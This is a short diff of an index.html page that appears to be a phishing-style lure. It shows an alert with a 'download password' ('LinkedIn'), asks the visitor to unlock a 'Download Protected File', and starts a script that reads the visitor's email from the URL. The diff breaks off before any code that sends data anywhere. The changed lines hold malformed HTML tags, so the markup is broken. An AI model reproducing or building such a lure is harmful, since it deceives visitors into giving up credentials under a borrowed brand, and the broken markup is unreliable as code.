--- a/index.html
+++ b/index.html
@@ -1,8 +1,8 @@
 <script language="javascript">alert(' The download password is: LinkedIn');  </script>
 
-<h2>Unlock your download by entering the password:<b> Linkedin Then click on the "Download File" button to get instant access to your content!</h2>
-<div style="font-size:16pt; color:black;" align="center"><b>Enter the Download Password as: </b></div> <div style="font-size:16pt; color:green;" align="center"><b>Linkedin </b></div>
-<enter><p><h2>Enter the Download Password as:<b>Linkedin</h2>
+<h2>Unlock your download by entering the password:<b> Linkedin Then click on the </div> < style="font-size:16pt; color:skyblue;" align="center"> "Download Protected File" </div> button to get instant access to your content!</h2>
+<div style="font-size:16pt; color:black;" align="center"><b>Enter the Download Password as: </b></div> < style="font-size:16pt; color:green;" align="center"><b>Linkedin </b></div>
+
 <script>const urlParams = new URLSearchParams(window.location.search);
 const id = urlParams.get('email');
 
